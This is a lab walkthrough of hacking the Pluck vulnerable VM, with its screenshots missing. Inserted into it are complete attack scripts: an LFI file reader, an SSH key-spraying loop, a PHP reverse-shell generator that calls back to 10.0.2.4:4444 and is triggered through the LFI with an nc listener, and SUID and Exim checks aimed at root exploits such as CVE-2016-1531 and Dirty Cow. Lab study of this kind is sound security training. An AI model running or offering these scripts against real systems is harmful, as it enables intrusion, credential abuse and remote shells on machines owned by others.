Wednesday, September 26, 2018



- Layout for this exercise:


- The goal of this exercise is to develop a hacking process for the vulnerable machine Pluck.

- Pluck can be downloaded from here:,178/

- Once downloaded, extracted and imported with VirtualBox:


- Using netdiscover let's confirm that the IP is

- Scanning with nmap:

- Browsing the web server:

- nikto helps discover a very promising LFI (Local File Inclusion) vulnerability in the web application:

- Let's check that the LFI works, for instance by reading /etc/passwd:

- From /etc/passwd we learn that there are users such as bob, peter, paul and backup-user:

- Also, reading the last line, it seems that there is a script for performing backups:

- Taking advantage of the LFI to read the script:

- The backup script tells us three things:

  • backups can be transferred with TFTP
  • the compressed backup file is located at /backups/backup.tar
  • both folders /home and /var/www/html are normally backed up

- Obviously, our next goal is to download backup.tar.
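- As an added example (not part of the original write-up), the following helpers build the traversal URL for the LFI, sanity-check that a response really is /etc/passwd, and list the accounts that have a usable login shell, which is how an odd shell such as a backup script stands out. The base URL http://pluck/index.php, the parameter name "page", the traversal depth and the sample passwd content are all assumptions; use what nikto reported.

```sh
#!/bin/sh
# Added example (not part of the original write-up): helpers for driving the
# LFI and triaging what /etc/passwd reveals. The base URL, the parameter name
# "page" and the traversal depth are assumptions; use what nikto reported.

# Build the request URL: lfi_url BASE PARAM ABSPATH [DEPTH]
# With DEPTH > 0 the leading "/" is dropped and DEPTH "../" are prepended,
# which is what a relative include() under the web root needs.
lfi_url() {
    base=$1; param=$2; path=$3; depth=${4:-0}
    prefix=""
    if [ "$depth" -gt 0 ]; then
        path=${path#/}
        i=0
        while [ "$i" -lt "$depth" ]; do
            prefix="${prefix}../"
            i=$((i + 1))
        done
    fi
    printf '%s?%s=%s%s\n' "$base" "$param" "$prefix" "$path"
}

# Fetch a file through the LFI (network; not exercised offline).
lfi_get() {
    curl -s "$(lfi_url "$@")"
}

# Sanity check: a real /etc/passwd starts with the root entry.
looks_like_passwd() {
    printf '%s\n' "$1" | grep -q '^root:x:0:0:'
}

# From passwd text on stdin, print user:home:shell for accounts with a usable
# login shell, so odd shells (a backup script, a menu program) stand out.
passwd_interesting() {
    awk -F: '$7 !~ /(nologin|false|sync|halt|shutdown)$/ { print $1 ":" $6 ":" $7 }'
}

# Constructed sample for the demo (NOT the real Pluck /etc/passwd; the
# script path and shells are placeholders).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
peter:x:1001:1001:peter,,,:/home/peter:/bin/bash
paul:x:1002:1002:paul,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:backup,,,:/backups:/opt/backup.sh'

echo "[*] probe URL: $(lfi_url http://pluck/index.php page /etc/passwd 4)"
if looks_like_passwd "$SAMPLE_PASSWD"; then
    echo "[*] accounts with a login shell:"
    printf '%s\n' "$SAMPLE_PASSWD" | passwd_interesting
fi
```

- Against the live target, replace the sample with the output of lfi_get and the same filter shows which non-system accounts exist and which of them run something other than a normal shell.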


3.1 - Local File Inclusion

- Trying to get backup.tar through the browser by means of the LFI is a bit messy, due to the huge size of the file:

- tftp does a better job:

- Also, curl would be a good alternative:

- Opening backup.tar:

- Now we have Pluck's backup folders available at our Kali machine:

- Searching for information inside bob's and peter's home folders, there is nothing out of the ordinary:

- However, we find a collection of 6 private and public keys inside paul's home folder:

- Checking the file type of these keys confirms that they are SSH keys:

- Now we can use these keys with the option -i identity_file to establish SSH connections:
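- As an added example (not part of the original write-up), the script below triages the key files found in the extracted backup and tries each one against SSH without any interactive prompt. The extraction directory, the target address held in TARGET and the candidate user names are assumptions; the key files used in the demo are constructed, not Pluck's.

```sh
#!/bin/sh
# Added example (not part of the original write-up): triage the key files
# recovered from the backup and try each one against SSH without prompts.
# The extraction directory, target host and candidate users are assumptions.

# List private key files under DIR (PEM and OpenSSH formats), sorted.
find_private_keys() {
    grep -rlE -- '^-----BEGIN (RSA |DSA |EC |OPENSSH )?PRIVATE KEY-----' "$1" 2>/dev/null | sort
}

# Exit 0 if a PEM key is passphrase-protected (would need cracking first).
# OpenSSH-format keys carry no text marker; for those use
#   ssh-keygen -y -P '' -f KEY   (fails when a passphrase is set).
key_is_encrypted() {
    grep -q -e 'Proc-Type: 4,ENCRYPTED' -e 'BEGIN ENCRYPTED PRIVATE KEY' "$1"
}

# Which user does a key belong to? Derive its public half and look for it in
# any authorized_keys file inside the backup (needs ssh-keygen; offline).
key_owner_hint() {
    key=$1; backup=$2
    pub=$(ssh-keygen -y -f "$key" 2>/dev/null | awk '{print $2}')
    [ -n "$pub" ] || return 1
    find "$backup" -name authorized_keys -exec grep -lF -- "$pub" {} +
}

# Try every key for each USER against HOST. BatchMode=yes forbids password
# prompts; -N opens no session (so a menu login shell never runs), which
# means a key that authenticates keeps the connection up until `timeout`
# kills it (exit 124), while a rejected key makes ssh exit 255 at once.
# Network; not exercised offline.
try_keys() {
    host=$1; keydir=$2; shift 2
    for key in $(find_private_keys "$keydir"); do
        chmod 600 "$key"   # ssh refuses keys readable by others
        for user in "$@"; do
            timeout 5 ssh -i "$key" -o BatchMode=yes -o StrictHostKeyChecking=no \
                -o ConnectTimeout=3 -N "$user@$host" 2>/dev/null
            if [ $? -eq 124 ]; then
                echo "[+] $key is accepted for $user@$host"
            fi
        done
    done
}

# Usage on Kali, after extracting backup.tar into the current directory
# (TARGET is the IP netdiscover reported; the user list is an assumption):
#   try_keys "$TARGET" ./home/paul paul bob peter
```

- Once a key is accepted, log in normally with ssh -i KEY user@TARGET; the -N trick only tells you which key the server takes, it does not give a session.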

- First attempt with id_key1 is unsuccessful:

- Same thing with id_key2 and id_key3:

- However, id_key4 leads to a Pdmenu:

- Pdmenu is a simple menu program that displays a menu from which the user can pick programs to run, for instance to edit files:

3.2 - Limited remote shell with PHP reverse shell

- Now, using Pdmenu, we are going to create a file called myshell.php remotely in the /home/paul folder, just by adapting the well-known PHP script php-reverse-shell.php to our needs:

- Editing the file /home/paul/myshell.php remotely with Pdmenu and pasting into it the content of the local myshell.php:

- Note that the text editor is Vim, so we save the file and quit with :wq!

- Now it is time for the actual exploitation: first we start a listening nc session, and second we request myshell.php through the LFI with curl so that the web server executes it:

- The exploitation is successful and we get a limited remote shell:
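- As an added example (not part of the original write-up), here is a small script that writes a minimal PHP reverse shell for a given attacker address and port, and shows the listener plus the curl request that triggers it through the LFI. It is not php-reverse-shell.php; the PHP is a shorter fsockopen/proc_open variant. The attacker address 10.0.2.4, port 4444, the base URL, the parameter name "page" and the traversal depth are assumptions.

```sh
#!/bin/sh
# Added example (not part of the original write-up): generate a PHP reverse
# shell for LHOST:LPORT and trigger it through the LFI. The attacker address,
# port, base URL, LFI parameter name and traversal depth are assumptions.

# Write a minimal PHP reverse shell to OUT, connecting back to LHOST:LPORT.
# The unquoted heredoc expands $lhost/$lport; the PHP variables are escaped.
gen_php_shell() {
    lhost=$1; lport=$2; out=$3
    cat > "$out" <<EOF
<?php
// Reverse shell: connect to $lhost:$lport and wire /bin/sh to the socket.
\$sock = fsockopen("$lhost", $lport);
if (!\$sock) { exit("connect failed"); }
\$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
proc_close(\$proc);
EOF
}

# Traversal URL that makes the vulnerable include() load an absolute path.
lfi_url() {
    base=$1; param=$2; path=$3; depth=${4:-0}
    prefix=""
    if [ "$depth" -gt 0 ]; then
        path=${path#/}
        i=0
        while [ "$i" -lt "$depth" ]; do
            prefix="${prefix}../"
            i=$((i + 1))
        done
    fi
    printf '%s?%s=%s%s\n' "$base" "$param" "$prefix" "$path"
}

# Start the listener, then ask the server to include the file we pasted into
# /home/paul/myshell.php via Pdmenu/Vim. The include runs the PHP, which
# connects back to us. Network; not exercised offline.
run_attack() {
    lhost=$1; lport=$2; base=$3; param=$4
    nc -lvnp "$lport" &
    sleep 1
    # curl -m keeps the request from hanging while the shell stays connected.
    curl -s -m 3 "$(lfi_url "$base" "$param" /home/paul/myshell.php 4)" >/dev/null
    wait
}

# Local demo: produce the payload to paste and print the trigger URL.
gen_php_shell 10.0.2.4 4444 ./myshell.php
echo "[*] payload written to ./myshell.php"
echo "[*] trigger: $(lfi_url http://pluck/index.php page /home/paul/myshell.php 4)"
```

- When pasting the generated file into Vim over SSH, run :set paste first if auto-indentation mangles the text; the usual invocation is run_attack 10.0.2.4 4444 http://pluck/index.php page.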

3.3 - Limited remote shell with VIM and external commands

- As an alternative, we now use Pdmenu to run the external command /bin/bash from inside the Vim editor, following these directions:

- Just by quitting Vim, Pdmenu comes back with a limited remote shell:


4.1 - Local Privilege Escalation with exim-4.84-7 exploit

- Searching for SUID files on the system, we discover exim-4.84-7:

- Exim (current version 4.91) is an SMTP message transfer agent (MTA) for Unix systems, released under the GPL and similar in style to Smail 3.

- Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument (CVE-2016-1531):
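- As an added example (not part of the original write-up), the script below enumerates SUID binaries, filters out those expected on a stock Debian/Ubuntu install so that an oddity like exim-4.84-7 stands out, and compares an Exim version string against the 4.86.2 fix. The baseline list, the /usr/exim/bin path in the sample and the sample find output are assumptions, not taken from Pluck.

```sh
#!/bin/sh
# Added example (not part of the original write-up): enumerate SUID binaries,
# hide the ones expected on a stock Debian/Ubuntu system, and check an Exim
# version against the CVE-2016-1531 fix (4.86.2). The baseline and the
# sample paths are assumptions.

# Run on the target; one path per line (network/target; not run offline).
suid_enum() {
    find / -perm -4000 -type f 2>/dev/null
}

# Paths commonly SUID on stock installs; anything else deserves a look.
SUID_BASELINE='/bin/su /bin/mount /bin/umount /bin/ping /bin/ping6 /bin/fusermount
/usr/bin/sudo /usr/bin/passwd /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd
/usr/bin/newgrp /usr/bin/pkexec /usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1'

# Filter stdin (find output) down to paths not in the baseline.
unusual_suid() {
    known=" $(printf '%s' "$SUID_BASELINE" | tr '\n' ' ') "
    while IFS= read -r p; do
        case "$known" in
            *" $p "*) ;;
            *) printf '%s\n' "$p" ;;
        esac
    done
}

# Exit 0 if VERSION (e.g. 4.84-7, as in the binary name) is older than the
# fixed release 4.86.2. Uses sort -V (GNU coreutils) for version ordering.
# Exploitability additionally requires the binary to be setuid root.
exim_vulnerable() {
    v=$1; fixed=4.86.2
    [ "$v" != "$fixed" ] && \
        [ "$(printf '%s\n%s\n' "$v" "$fixed" | sort -V | head -n 1)" = "$v" ]
}

# Constructed sample find output (NOT real Pluck output; path assumed).
SAMPLE_FIND='/bin/su
/usr/bin/passwd
/usr/bin/sudo
/usr/exim/bin/exim-4.84-7
/usr/bin/pkexec'

echo "[*] unusual SUID binaries:"
printf '%s\n' "$SAMPLE_FIND" | unusual_suid
for v in 4.84-7 4.86.2 4.91; do
    if exim_vulnerable "$v"; then
        echo "[+] exim $v: older than 4.86.2, perl_startup LPE candidate"
    else
        echo "[-] exim $v: not affected by CVE-2016-1531"
    fi
done
```

- On the target, pipe the real enumeration through the filter with suid_enum | unusual_suid; the version to test is read off the binary name or from exim -bV.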

- There is a Local Privilege Escalation exploit related to this vulnerability:

- Copying the script to a new file:

- Transferring it from Kali to Pluck, specifically to the /tmp folder:

- The transfer is successful, but the file has no execute permission:

- Giving it execute permission:

- Running the script, we finally get a remote root shell:

4.2 - Local Privilege Escalation with Dirty Cow Kernel Exploit

- An alternative to the method explained in 4.1 is the Dirty Cow (CVE-2016-5195) kernel exploit:

- Downloading to Kali:

- Transferring to Pluck:

- Compiling:

- Running cowroot, we get a remote root shell:

- Apparently cowroot destabilizes the system, so we follow these directions to obtain a more stable shell:


- Reading flag.txt: